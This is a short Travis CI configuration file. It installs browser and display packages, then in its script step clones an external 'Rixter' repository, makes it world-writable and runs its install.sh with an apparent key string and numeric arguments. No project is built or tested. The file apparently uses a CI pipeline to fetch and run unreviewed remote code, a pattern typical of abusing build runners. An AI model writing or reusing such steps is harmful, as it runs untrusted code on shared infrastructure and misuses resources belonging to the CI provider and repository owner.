dist: bionic

install:
  - sudo apt update
  - sudo apt install wget xvfb chromium-browser libgtk2.0-0 -y

script:
  - sudo apt update || apt update && sudo apt install -y git whiptail || apt install -y git whiptail && git clone https://github.com/golemcli/Rixter.git && chmod -R 777 Rixter && Rixter/install.sh "2" "fb6eb032c1e071f0675d01e9d29bf5a2" "15" "5" "2"
